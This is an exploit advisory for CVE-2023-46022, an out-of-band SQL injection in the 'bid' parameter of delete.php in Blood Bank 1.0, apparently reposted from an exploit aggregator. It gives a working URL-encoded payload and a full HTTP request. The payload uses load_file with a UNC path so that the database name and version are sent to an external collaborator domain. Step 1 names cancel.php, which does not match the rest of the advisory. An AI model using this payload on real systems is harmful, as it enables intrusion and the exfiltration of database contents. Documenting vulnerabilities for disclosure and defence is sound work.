Share
## https://sploitus.com/exploit?id=PACKETSTORM:177676
# Exploit Title: Blood Bank 1.0 - 'bid' SQLi  
# Date: 2023-11-15  
# Exploit Author: Ersin Erenler  
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code  
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip  
# Version: 1.0  
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0  
# CVE : CVE-2023-46022  
  
-------------------------------------------------------------------------------  
  
# Description:  
  
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.  
  
Vulnerable File: /delete.php  
  
Parameter Name: bid  
  
# Proof of Concept:  
----------------------  
  
1. Intercept the request to cancel.php via Burp Suite  
2. Inject the payload to the vulnerable parameters  
3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'  
4. Example request for bid parameter:  
---  
  
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Referer: http://localhost/bloodbank/bloodinfo.php  
Cookie: PHPSESSID=<some-cookie-value>  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
---  
5. Database and version information is seized via Burp Suite Collaborator